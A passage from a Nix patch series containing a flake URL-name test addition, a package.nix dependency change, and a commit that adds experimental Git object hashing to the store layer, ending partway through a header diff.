--- a/tests/unit/libexpr/flake/url-name.cc
+++ b/tests/unit/libexpr/flake/url-name.cc
@@ -14,6 +14,7 @@ namespace nix {
         ASSERT_EQ(getNameFromURL(parseURL("path:./repos/myflake#nonStandardAttr.mylaptop")), "mylaptop");
         ASSERT_EQ(getNameFromURL(parseURL("path:./nixpkgs#packages.x86_64-linux.complex^bin,man")), "complex");
         ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#packages.x86_64-linux.default^*")), "myproj");
+        ASSERT_EQ(getNameFromURL(parseURL("path:./myproj#defaultPackage.x86_64-linux")), "myproj");
 
         ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#packages.x86_64-linux.hello")), "hello");
         ASSERT_EQ(getNameFromURL(parseURL("github:NixOS/nixpkgs#hello")), "hello");

From 04836c73e5589ec10bef08992a7ef815a7f7592c Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sun, 21 Jan 2024 14:01:57 -0500
Subject: [PATCH 523/654] Merge `nativeCheckInputs` into `nativeBuildInputs`

They were getting skipped for the test-against checks.
---
 package.nix | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/package.nix b/package.nix
index d1d14d10e..1f895e301 100644
--- a/package.nix
+++ b/package.nix
@@ -209,6 +209,10 @@ in {
     (lib.getBin lowdown)
     mdbook
     mdbook-linkcheck
+  ] ++ lib.optionals doInstallCheck [
+    git
+    mercurial
+    openssh
   ] ++ lib.optionals (doInstallCheck || enableManual) [
     jq # Also for custom mdBook preprocessor.
   ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux
@@ -249,12 +253,6 @@ in {
   dontBuild = !attrs.doBuild;
   doCheck = attrs.doCheck;
 
-  nativeCheckInputs = [
-    git
-    mercurial
-    openssh
-  ];
-
   disallowedReferences = [ boost ];
 
   preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) (

From 201551c937c3f816a23c4c2f36edba60619e42f9 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Mon, 4 Sep 2023 09:51:23 -0400
Subject: [PATCH 524/654] Add Git object hashing to the store layer

Part of RFC 133

Extracted from our old IPFS branches.

Co-Authored-By: Matthew Bauer 
Co-Authored-By: Carlo Nucera 
Co-authored-by: Robert Hensing 
Co-authored-by: Florian Klink 
---
 Makefile                                    |   1 +
 doc/manual/src/protocols/store-path.md      |   9 +-
 perl/lib/Nix/Store.xs                       |   2 +-
 src/libexpr/primops.cc                      |   5 +-
 src/libstore/binary-cache-store.cc          |   7 +-
 src/libstore/binary-cache-store.hh          |   2 +-
 src/libstore/build/local-derivation-goal.cc |  34 ++++--
 src/libstore/build/worker.cc                |   4 +-
 src/libstore/content-address.cc             |  11 ++
 src/libstore/daemon.cc                      |   7 +-
 src/libstore/local-fs-store.hh              |   2 +-
 src/libstore/local-store.cc                 |  85 ++++++++++++---
 src/libstore/optimise-store.cc              |   4 +-
 src/libstore/remote-store.cc                |   1 +
 src/libstore/remote-store.hh                |   2 +-
 src/libstore/store-api.cc                   |  45 +++++++-
 src/libstore/uds-remote-store.hh            |   2 +-
 src/libutil/file-content-address.cc         |  81 +++++++++++---
 src/libutil/file-content-address.hh         | 110 ++++++++++++++++----
 src/nix-store/nix-store.cc                  |   2 +-
 src/nix/add-to-store.cc                     |   1 +
 src/nix/hash.cc                             |  47 +++++++--
 tests/functional/git-hashing/common.sh      |  11 ++
 tests/functional/git-hashing/local.mk       |   7 ++
 tests/functional/git-hashing/simple.sh      |  58 +++++++++++
 tests/unit/libstore/content-address.cc      |   2 +
 tests/unit/libutil/file-content-address.cc  |  28 +++++
 27 files changed, 484 insertions(+), 86 deletions(-)
 create mode 100644 tests/functional/git-hashing/common.sh
 create mode 100644 tests/functional/git-hashing/local.mk
 create mode 100644 tests/functional/git-hashing/simple.sh

diff --git a/Makefile b/Makefile
index f8689c8cf..745e60aa5 100644
--- a/Makefile
+++ b/Makefile
@@ -42,6 +42,7 @@ ifeq ($(ENABLE_FUNCTIONAL_TESTS), yes)
 makefiles += \
   tests/functional/local.mk \
   tests/functional/ca/local.mk \
+  tests/functional/git-hashing/local.mk \
   tests/functional/dyn-drv/local.mk \
   tests/functional/test-libstoreconsumer/local.mk \
   tests/functional/plugins/local.mk
diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md
index fcf8038fc..565c4fa75 100644
--- a/doc/manual/src/protocols/store-path.md
+++ b/doc/manual/src/protocols/store-path.md
@@ -89,15 +89,20 @@ where
 
       - `rec` = one of:
 
+        - ```ebnf
+          | ""
+          ```
+          (empty string) for hashes of the flat (single file) serialization
+
         - ```ebnf
           | "r:"
           ```
           hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
         - ```ebnf
-          | ""
+          | "git:"
           ```
-          (empty string) for hashes of the flat (single file) serialization
+          hashes of the [Git blob/tree](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects) [Merkel tree](https://en.wikipedia.org/wiki/Merkle_tree) format
 
       - ```ebnf
         algo = "md5" | "sha1" | "sha256"
diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs
index 4a928594b..1c64cc66b 100644
--- a/perl/lib/Nix/Store.xs
+++ b/perl/lib/Nix/Store.xs
@@ -259,7 +259,7 @@ hashPath(char * algo, int base32, char * path)
             auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path);
             Hash h = hashPath(
                 accessor, canonPath,
-                FileIngestionMethod::Recursive, parseHashAlgo(algo)).first;
+                FileIngestionMethod::Recursive, parseHashAlgo(algo));
             auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false);
             XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0)));
         } catch (Error & e) {
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 850cc7a45..9ea266cf9 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1138,7 +1138,10 @@ drvName, Bindings * attrs, Value & v)
         auto handleHashMode = [&](const std::string_view s) {
             if (s == "recursive") ingestionMethod = FileIngestionMethod::Recursive;
             else if (s == "flat") ingestionMethod = FileIngestionMethod::Flat;
-            else if (s == "text") {
+            else if (s == "git") {
+                experimentalFeatureSettings.require(Xp::GitHashing);
+                ingestionMethod = FileIngestionMethod::Git;
+            } else if (s == "text") {
                 experimentalFeatureSettings.require(Xp::DynamicDerivations);
                 ingestionMethod = TextIngestionMethod {};
             } else
diff --git a/src/libstore/binary-cache-store.cc b/src/libstore/binary-cache-store.cc
index 189d1d305..d6047dd7e 100644
--- a/src/libstore/binary-cache-store.cc
+++ b/src/libstore/binary-cache-store.cc
@@ -324,6 +324,7 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             nar = dump2.s;
             break;
         case FileIngestionMethod::Flat:
+        {
             // The dump is Flat, so we need to convert it to NAR with a
             // single file.
             StringSink s;
@@ -331,6 +332,10 @@ StorePath BinaryCacheStore::addToStoreFromDump(
             nar = std::move(s.s);
             break;
         }
+        case FileIngestionMethod::Git:
+            unsupported("addToStoreFromDump");
+            break;
+        }
     } else {
         // Otherwise, we have to do th same hashing as NAR so our single
         // hash will suffice for both purposes.
@@ -450,7 +455,7 @@ StorePath BinaryCacheStore::addToStore(
        non-recursive+sha256 so we can just use the default
        implementation of this method in terms of addToStoreFromDump. */
 
-    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first;
+    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter);
 
     auto source = sinkToSource([&](Sink & sink) {
         accessor.dumpPath(path, sink, filter);
diff --git a/src/libstore/binary-cache-store.hh b/src/libstore/binary-cache-store.hh
index 00ab73905..76de2d11a 100644
--- a/src/libstore/binary-cache-store.hh
+++ b/src/libstore/binary-cache-store.hh
@@ -147,7 +147,7 @@ public:
 
     void narFromPath(const StorePath & path, Sink & sink) override;
 
-    ref getFSAccessor(bool requireValidPath) override;
+    ref getFSAccessor(bool requireValidPath = true) override;
 
     void addSignatures(const StorePath & storePath, const StringSet & sigs) override;
 
diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index b373c74b2..d92966a74 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -8,6 +8,7 @@
 #include "finally.hh"
 #include "util.hh"
 #include "archive.hh"
+#include "git.hh"
 #include "compression.hh"
 #include "daemon.hh"
 #include "topo-sort.hh"
@@ -2457,15 +2458,28 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
             rewriteOutput(outputRewrites);
             /* FIXME optimize and deduplicate with addToStore */
             std::string oldHashPart { scratchPath->hashPart() };
-            auto got = ({
-                HashModuloSink caSink { outputHash.hashAlgo, oldHashPart };
+            auto got = [&]{
                 PosixSourceAccessor accessor;
-                dumpPath(
-                    accessor, CanonPath { actualPath },
-                    caSink,
-                    outputHash.method.getFileIngestionMethod());
-                caSink.finish().first;
-            });
+                auto fim = outputHash.method.getFileIngestionMethod();
+                switch (fim) {
+                case FileIngestionMethod::Flat:
+                case FileIngestionMethod::Recursive:
+                {
+                    HashModuloSink caSink { outputHash.hashAlgo, oldHashPart };
+                    auto fim = outputHash.method.getFileIngestionMethod();
+                    dumpPath(
+                        accessor, CanonPath { actualPath },
+                        caSink,
+                        (FileSerialisationMethod) fim);
+                    return caSink.finish().first;
+                }
+                case FileIngestionMethod::Git: {
+                    return git::dumpHash(
+                        outputHash.hashAlgo, accessor,
+                        CanonPath { tmpDir + "/tmp" }).hash;
+                }
+                }
+            }();
 
             ValidPathInfo newInfo0 {
                 worker.store,
@@ -2491,7 +2505,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                 PosixSourceAccessor accessor;
                 HashResult narHashAndSize = hashPath(
                     accessor, CanonPath { actualPath },
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256);
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256);
                 newInfo0.narHash = narHashAndSize.first;
                 newInfo0.narSize = narHashAndSize.second;
             }
@@ -2515,7 +2529,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs()
                 PosixSourceAccessor accessor;
                 HashResult narHashAndSize = hashPath(
                     accessor, CanonPath { actualPath },
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256);
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256);
                 ValidPathInfo newInfo0 { requiredFinalPath, narHashAndSize.first };
                 newInfo0.narSize = narHashAndSize.second;
                 auto refs = rewriteRefs();
diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc
index 3a34f4006..815ded3d5 100644
--- a/src/libstore/build/worker.cc
+++ b/src/libstore/build/worker.cc
@@ -529,11 +529,11 @@ bool Worker::pathContentsGood(const StorePath & path)
     if (!pathExists(store.printStorePath(path)))
         res = false;
     else {
-        HashResult current = hashPath(
+        Hash current = hashPath(
             *store.getFSAccessor(), CanonPath { store.printStorePath(path) },
             FileIngestionMethod::Recursive, info->narHash.algo);
         Hash nullHash(HashAlgorithm::SHA256);
-        res = info->narHash == nullHash || info->narHash == current.first;
+        res = info->narHash == nullHash || info->narHash == current;
     }
     pathContentsGoodCache.insert_or_assign(path, res);
     if (!res)
diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc
index 4e3d2f64d..4ed4f2de5 100644
--- a/src/libstore/content-address.cc
+++ b/src/libstore/content-address.cc
@@ -11,6 +11,9 @@ std::string_view makeFileIngestionPrefix(FileIngestionMethod m)
         return "";
     case FileIngestionMethod::Recursive:
         return "r:";
+    case FileIngestionMethod::Git:
+        experimentalFeatureSettings.require(Xp::GitHashing);
+        return "git:";
     default:
         throw Error("impossible, caught both cases");
     }
@@ -51,6 +54,10 @@ ContentAddressMethod ContentAddressMethod::parsePrefix(std::string_view & m)
     if (splitPrefix(m, "r:")) {
         return FileIngestionMethod::Recursive;
     }
+    else if (splitPrefix(m, "git:")) {
+        experimentalFeatureSettings.require(Xp::GitHashing);
+        return FileIngestionMethod::Git;
+    }
     else if (splitPrefix(m, "text:")) {
         return TextIngestionMethod {};
     }
@@ -131,6 +138,10 @@ static std::pair parseContentAddressMethodP
         auto method = FileIngestionMethod::Flat;
         if (splitPrefix(rest, "r:"))
             method = FileIngestionMethod::Recursive;
+        else if (splitPrefix(rest, "git:")) {
+            experimentalFeatureSettings.require(Xp::GitHashing);
+            method = FileIngestionMethod::Git;
+        }
         HashAlgorithm hashAlgo = parseHashAlgorithm_();
         return {
             std::move(method),
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index cf5020dfe..873065e14 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -13,6 +13,7 @@
 #include "archive.hh"
 #include "derivations.hh"
 #include "args.hh"
+#include "git.hh"
 
 namespace nix::daemon {
 
@@ -443,13 +444,17 @@ static void performOp(TunnelLogger * logger, ref store,
                     TeeSource savedNARSource(from, saved);
                     NullFileSystemObjectSink sink; /* just parse the NAR */
                     parseDump(sink, savedNARSource);
-                } else {
+                } else if (method == FileIngestionMethod::Flat) {
                     /* Incrementally parse the NAR file, stripping the
                        metadata, and streaming the sole file we expect into
                        `saved`. */
                     RegularFileSink savedRegular { saved };
                     parseDump(savedRegular, from);
                     if (!savedRegular.regular) throw Error("regular file expected");
+                } else {
+                    /* Should have validated above that no other file ingestion
+                       method was used. */
+                    assert(false);
                 }
             });
             logger->startWork();
diff --git a/src/libstore/local-fs-store.hh b/src/libstore/local-fs-store.hh
index bf855b67e..8fb081200 100644
--- a/src/libstore/local-fs-store.hh
+++ b/src/libstore/local-fs-store.hh
@@ -43,7 +43,7 @@ public:
     LocalFSStore(const Params & params);
 
     void narFromPath(const StorePath & path, Sink & sink) override;
-    ref getFSAccessor(bool requireValidPath) override;
+    ref getFSAccessor(bool requireValidPath = true) override;
 
     /**
      * Creates symlink from the `gcRoot` to the `storePath` and
diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
index 2c22bfe31..5f35cf3a8 100644
--- a/src/libstore/local-store.cc
+++ b/src/libstore/local-store.cc
@@ -1,5 +1,6 @@
 #include "local-store.hh"
 #include "globals.hh"
+#include "git.hh"
 #include "archive.hh"
 #include "pathlocks.hh"
 #include "worker-protocol.hh"
@@ -1097,19 +1098,29 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source,
             if (info.ca) {
                 auto & specified = *info.ca;
                 auto actualHash = ({
-                    HashModuloSink caSink {
-                        specified.hash.algo,
-                        std::string { info.path.hashPart() },
-                    };
-                    PosixSourceAccessor accessor;
-                    dumpPath(
-                        *getFSAccessor(false),
-                        CanonPath { printStorePath(info.path) },
-                        caSink,
-                        specified.method.getFileIngestionMethod());
+                    auto accessor = getFSAccessor(false);
+                    CanonPath path { printStorePath(info.path) };
+                    Hash h { HashAlgorithm::SHA256 }; // throwaway def to appease C++
+                    auto fim = specified.method.getFileIngestionMethod();
+                    switch (fim) {
+                    case FileIngestionMethod::Flat:
+                    case FileIngestionMethod::Recursive:
+                    {
+                        HashModuloSink caSink {
+                            specified.hash.algo,
+                            std::string { info.path.hashPart() },
+                        };
+                        dumpPath(*accessor, path, caSink, (FileSerialisationMethod) fim);
+                        h = caSink.finish().first;
+                        break;
+                    }
+                    case FileIngestionMethod::Git:
+                        h = git::dumpHash(specified.hash.algo, *accessor, path).hash;
+                        break;
+                    }
                     ContentAddress {
                         .method = specified.method,
-                        .hash = caSink.finish().first,
+                        .hash = std::move(h),
                     };
                 });
                 if (specified.hash != actualHash.hash) {
@@ -1199,7 +1210,30 @@ StorePath LocalStore::addToStoreFromDump(
         delTempDir = std::make_unique(tempDir);
         tempPath = tempDir + "/x";
 
-        restorePath(tempPath, bothSource, method.getFileIngestionMethod());
+        auto fim = method.getFileIngestionMethod();
+        switch (fim) {
+        case FileIngestionMethod::Flat:
+        case FileIngestionMethod::Recursive:
+            restorePath(tempPath, bothSource, (FileSerialisationMethod) fim);
+            break;
+        case FileIngestionMethod::Git: {
+            RestoreSink sink;
+            sink.dstPath = tempPath;
+            auto accessor = getFSAccessor();
+            git::restore(sink, bothSource, [&](Hash childHash) {
+                return std::pair {
+                    &*accessor,
+                    CanonPath {
+                        printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
+                            .method = FileIngestionMethod::Git,
+                            .hash = childHash,
+                        }))
+                    },
+                };
+            });
+            break;
+        }
+        }
 
         dumpBuffer.reset();
         dump = {};
@@ -1238,7 +1272,30 @@ StorePath LocalStore::addToStoreFromDump(
             if (inMemory) {
                 StringSource dumpSource { dump };
                 /* Restore from the buffer in memory. */
-                restorePath(realPath, dumpSource, method.getFileIngestionMethod());
+                auto fim = method.getFileIngestionMethod();
+                switch (fim) {
+                case FileIngestionMethod::Flat:
+                case FileIngestionMethod::Recursive:
+                    restorePath(realPath, dumpSource, (FileSerialisationMethod) fim);
+                    break;
+                case FileIngestionMethod::Git: {
+                    RestoreSink sink;
+                    sink.dstPath = realPath;
+                    auto accessor = getFSAccessor();
+                    git::restore(sink, dumpSource, [&](Hash childHash) {
+                        return std::pair {
+                            &*accessor,
+                            CanonPath {
+                                printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
+                                    .method = FileIngestionMethod::Git,
+                                    .hash = childHash,
+                                }))
+                            },
+                        };
+                    });
+                    break;
+                }
+                }
             } else {
                 /* Move the temporary path we restored above. */
                 moveFile(tempPath, realPath);
@@ -1367,7 +1424,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair)
             PosixSourceAccessor accessor;
             std::string hash = hashPath(
                 accessor, CanonPath { linkPath },
-                FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first.to_string(HashFormat::Nix32, false);
+                FileIngestionMethod::Recursive, HashAlgorithm::SHA256).to_string(HashFormat::Nix32, false);
             if (hash != link.name) {
                 printError("link '%s' was modified! expected hash '%s', got '%s'",
                     linkPath, link.name, hash);
diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc
index 78e4f6d86..daaaaf073 100644
--- a/src/libstore/optimise-store.cc
+++ b/src/libstore/optimise-store.cc
@@ -151,7 +151,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats,
         PosixSourceAccessor accessor;
         hashPath(
             accessor, CanonPath { path },
-            FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first;
+            FileSerialisationMethod::Recursive, HashAlgorithm::SHA256).first;
     });
     debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Nix32, true));
 
@@ -166,7 +166,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats,
                 PosixSourceAccessor accessor;
                 hashPath(
                     accessor, CanonPath { linkPath },
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first;
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256).first;
            })))
         {
             // XXX: Consider overwriting linkPath with our valid version.
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index fadef45ff..0cae84828 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -13,6 +13,7 @@
 #include "derivations.hh"
 #include "pool.hh"
 #include "finally.hh"
+#include "git.hh"
 #include "logging.hh"
 #include "callback.hh"
 #include "filetransfer.hh"
diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh
index 87704985b..c51a21375 100644
--- a/src/libstore/remote-store.hh
+++ b/src/libstore/remote-store.hh
@@ -184,7 +184,7 @@ protected:
 
     friend struct ConnectionHandle;
 
-    virtual ref getFSAccessor(bool requireValidPath) override;
+    virtual ref getFSAccessor(bool requireValidPath = true) override;
 
     virtual void narFromPath(const StorePath & path, Sink & sink) override;
 
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index 4238cbbf5..c44612ec5 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -12,7 +12,9 @@
 #include "references.hh"
 #include "archive.hh"
 #include "callback.hh"
+#include "git.hh"
 #include "remote-store.hh"
+#include "posix-source-accessor.hh"
 // FIXME this should not be here, see TODO below on
 // `addMultipleToStore`.
 #include "worker-protocol.hh"
@@ -119,6 +121,9 @@ static std::string makeType(
 
 StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const FixedOutputInfo & info) const
 {
+    if (info.method == FileIngestionMethod::Git && info.hash.algo != HashAlgorithm::SHA1)
+        throw Error("Git file ingestion must use SHA-1 hash");
+
     if (info.hash.algo == HashAlgorithm::SHA256 && info.method == FileIngestionMethod::Recursive) {
         return makeStorePath(makeType(*this, "source", info.references), info.hash, name);
     } else {
@@ -166,7 +171,7 @@ std::pair StoreDirConfig::computeStorePath(
     const StorePathSet & references,
     PathFilter & filter) const
 {
-    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first;
+    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter);
     return {
         makeFixedOutputPathFromCA(
             name,
@@ -193,7 +198,37 @@ StorePath Store::addToStore(
     RepairFlag repair)
 {
     auto source = sinkToSource([&](Sink & sink) {
-        dumpPath(accessor, path, sink, method.getFileIngestionMethod(), filter);
+        auto fim = method.getFileIngestionMethod();
+        switch (fim) {
+        case FileIngestionMethod::Flat:
+        case FileIngestionMethod::Recursive:
+        {
+            dumpPath(accessor, path, sink, (FileSerialisationMethod) fim, filter);
+            break;
+        }
+        case FileIngestionMethod::Git:
+        {
+            git::dump(
+                accessor, path,
+                sink,
+                // recursively add to store if path is a directory
+                [&](const CanonPath & path) -> git::TreeEntry {
+                    auto storePath = addToStore("git", accessor, path, method, hashAlgo, references, filter, repair);
+                    auto info = queryPathInfo(storePath);
+                    assert(info->ca);
+                    assert(info->ca->method == FileIngestionMethod::Git);
+                    auto stat = getFSAccessor()->lstat(CanonPath(printStorePath(storePath)));
+                    auto gitModeOpt = git::convertMode(stat.type);
+                    assert(gitModeOpt);
+                    return {
+                        .mode = *gitModeOpt,
+                        .hash = info->ca->hash,
+                    };
+                },
+                filter);
+            break;
+        }
+        }
     });
     return addToStoreFromDump(*source, name, method, hashAlgo, references, repair);
 }
@@ -355,9 +390,7 @@ ValidPathInfo Store::addToStoreSlow(
     NullFileSystemObjectSink blank;
     auto & parseSink = method.getFileIngestionMethod() == FileIngestionMethod::Flat
         ? (FileSystemObjectSink &) fileSink
-        : method.getFileIngestionMethod() == FileIngestionMethod::Recursive
-        ? (FileSystemObjectSink &) blank
-        : (abort(), (FileSystemObjectSink &)*(FileSystemObjectSink *)nullptr); // handled both cases
+        : (FileSystemObjectSink &) blank; // for recursive or git we do recursive
 
     /* The information that flows from tapped (besides being replicated in
        narSink), is now put in parseSink. */
@@ -369,6 +402,8 @@ ValidPathInfo Store::addToStoreSlow(
 
     auto hash = method == FileIngestionMethod::Recursive && hashAlgo == HashAlgorithm::SHA256
         ? narHash
+        : method == FileIngestionMethod::Git
+        ? git::dumpHash(hashAlgo, accessor, srcPath).hash
         : caHashSink.finish().first;
 
     if (expectedCAHash && expectedCAHash != hash)
diff --git a/src/libstore/uds-remote-store.hh b/src/libstore/uds-remote-store.hh
index a5ac9080a..8bce8994a 100644
--- a/src/libstore/uds-remote-store.hh
+++ b/src/libstore/uds-remote-store.hh
@@ -35,7 +35,7 @@ public:
     static std::set uriSchemes()
     { return {"unix"}; }
 
-    ref getFSAccessor(bool requireValidPath) override
+    ref getFSAccessor(bool requireValidPath = true) override
     { return LocalFSStore::getFSAccessor(requireValidPath); }
 
     void narFromPath(const StorePath & path, Sink & sink) override
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 2339024a2..471bda6a0 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -1,16 +1,53 @@
 #include "file-content-address.hh"
 #include "archive.hh"
+#include "git.hh"
 
 namespace nix {
 
-FileIngestionMethod parseFileIngestionMethod(std::string_view input)
+static std::optional parseFileSerialisationMethodOpt(std::string_view input)
 {
     if (input == "flat") {
-        return FileIngestionMethod::Flat;
+        return FileSerialisationMethod::Flat;
     } else if (input == "nar") {
-        return FileIngestionMethod::Recursive;
+        return FileSerialisationMethod::Recursive;
     } else {
-        throw UsageError("Unknown file ingestion method '%s', expect `flat` or `nar`");
+        return std::nullopt;
+    }
+}
+
+FileSerialisationMethod parseFileSerialisationMethod(std::string_view input)
+{
+    auto ret = parseFileSerialisationMethodOpt(input);
+    if (ret)
+        return *ret;
+    else
+        throw UsageError("Unknown file serialiation method '%s', expect `flat` or `nar`");
+}
+
+
+FileIngestionMethod parseFileIngestionMethod(std::string_view input)
+{
+    if (input == "git") {
+        return FileIngestionMethod::Git;
+    } else {
+        auto ret = parseFileSerialisationMethodOpt(input);
+        if (ret)
+            return static_cast(*ret);
+        else
+            throw UsageError("Unknown file ingestion method '%s', expect `flat`, `nar`, or `git`");
+    }
+}
+
+
+std::string_view renderFileSerialisationMethod(FileSerialisationMethod method)
+{
+    switch (method) {
+    case FileSerialisationMethod::Flat:
+        return "flat";
+    case FileSerialisationMethod::Recursive:
+        return "nar";
+    default:
+        assert(false);
     }
 }
 
@@ -19,9 +56,11 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method)
 {
     switch (method) {
     case FileIngestionMethod::Flat:
-        return "flat";
     case FileIngestionMethod::Recursive:
-        return "nar";
+        return renderFileSerialisationMethod(
+            static_cast(method));
+    case FileIngestionMethod::Git:
+        return "git";
     default:
         abort();
     }
@@ -31,14 +70,14 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method)
 void dumpPath(
     SourceAccessor & accessor, const CanonPath & path,
     Sink & sink,
-    FileIngestionMethod method,
+    FileSerialisationMethod method,
     PathFilter & filter)
 {
     switch (method) {
-    case FileIngestionMethod::Flat:
+    case FileSerialisationMethod::Flat:
         accessor.readFile(path, sink);
         break;
-    case FileIngestionMethod::Recursive:
+    case FileSerialisationMethod::Recursive:
         accessor.dumpPath(path, sink, filter);
         break;
     }
@@ -48,13 +87,13 @@ void dumpPath(
 void restorePath(
     const Path & path,
     Source & source,
-    FileIngestionMethod method)
+    FileSerialisationMethod method)
 {
     switch (method) {
-    case FileIngestionMethod::Flat:
+    case FileSerialisationMethod::Flat:
         writeFile(path, source);
         break;
-    case FileIngestionMethod::Recursive:
+    case FileSerialisationMethod::Recursive:
         restorePath(path, source);
         break;
     }
@@ -63,7 +102,7 @@ void restorePath(
 
 HashResult hashPath(
     SourceAccessor & accessor, const CanonPath & path,
-    FileIngestionMethod method, HashAlgorithm ha,
+    FileSerialisationMethod method, HashAlgorithm ha,
     PathFilter & filter)
 {
     HashSink sink { ha };
@@ -71,4 +110,20 @@ HashResult hashPath(
     return sink.finish();
 }
 
+
+Hash hashPath(
+    SourceAccessor & accessor, const CanonPath & path,
+    FileIngestionMethod method, HashAlgorithm ht,
+    PathFilter & filter)
+{
+    switch (method) {
+    case FileIngestionMethod::Flat:
+    case FileIngestionMethod::Recursive:
+        return hashPath(accessor, path, (FileSerialisationMethod) method, ht, filter).first;
+    case FileIngestionMethod::Git:
+        return git::dumpHash(ht, accessor, path, filter).hash;
+    }
+
+}
+
 }
diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh
index 9a7dae8c6..b361ab243 100644
--- a/src/libutil/file-content-address.hh
+++ b/src/libutil/file-content-address.hh
@@ -8,37 +8,38 @@
 namespace nix {
 
 /**
- * An enumeration of the main ways we can serialize file system
+ * An enumeration of the ways we can serialize file system
  * objects.
  */
-enum struct FileIngestionMethod : uint8_t {
+enum struct FileSerialisationMethod : uint8_t {
     /**
-     * Flat-file hashing. Directly ingest the contents of a single file
+     * Flat-file. The contents of a single file exactly.
      */
-    Flat = 0,
+    Flat,
+
     /**
-     * Recursive (or NAR) hashing. Serializes the file-system object in
-     * Nix Archive format and ingest that.
+     * Nix Archive. Serializes the file-system object in
+     * Nix Archive format.
      */
-    Recursive = 1,
+    Recursive,
 };
 
 /**
- * Parse a `FileIngestionMethod` by name. Choice of:
+ * Parse a `FileSerialisationMethod` by name. Choice of:
  *
- *  - `flat`: `FileIngestionMethod::Flat`
- *  - `nar`: `FileIngestionMethod::Recursive`
+ *  - `flat`: `FileSerialisationMethod::Flat`
+ *  - `nar`: `FileSerialisationMethod::Recursive`
  *
- * Oppostite of `renderFileIngestionMethod`.
+ * Opposite of `renderFileSerialisationMethod`.
  */
-FileIngestionMethod parseFileIngestionMethod(std::string_view input);
+FileSerialisationMethod parseFileSerialisationMethod(std::string_view input);
 
 /**
- * Render a `FileIngestionMethod` by name.
+ * Render a `FileSerialisationMethod` by name.
  *
- * Oppostite of `parseFileIngestionMethod`.
+ * Opposite of `parseFileSerialisationMethod`.
  */
-std::string_view renderFileIngestionMethod(FileIngestionMethod method);
+std::string_view renderFileSerialisationMethod(FileSerialisationMethod method);
 
 /**
  * Dump a serialization of the given file system object.
@@ -46,26 +47,97 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method);
 void dumpPath(
     SourceAccessor & accessor, const CanonPath & path,
     Sink & sink,
-    FileIngestionMethod method,
+    FileSerialisationMethod method,
     PathFilter & filter = defaultPathFilter);
 
 /**
- * Restore a serialization of the given file system object.
+ * Restore a serialisation of the given file system object.
  *
  * @TODO use an arbitrary `FileSystemObjectSink`.
  */
 void restorePath(
     const Path & path,
     Source & source,
-    FileIngestionMethod method);
+    FileSerialisationMethod method);
+
 
 /**
  * Compute the hash of the given file system object according to the
  * given method.
  *
- * The hash is defined as (essentially) hashString(ha, dumpPath(path)).
+ * the hash is defined as (in pseudocode):
+ *
+ * ```
+ * hashString(ha, dumpPath(...))
+ * ```
  */
 HashResult hashPath(
+    SourceAccessor & accessor, const CanonPath & path,
+    FileSerialisationMethod method, HashAlgorithm ha,
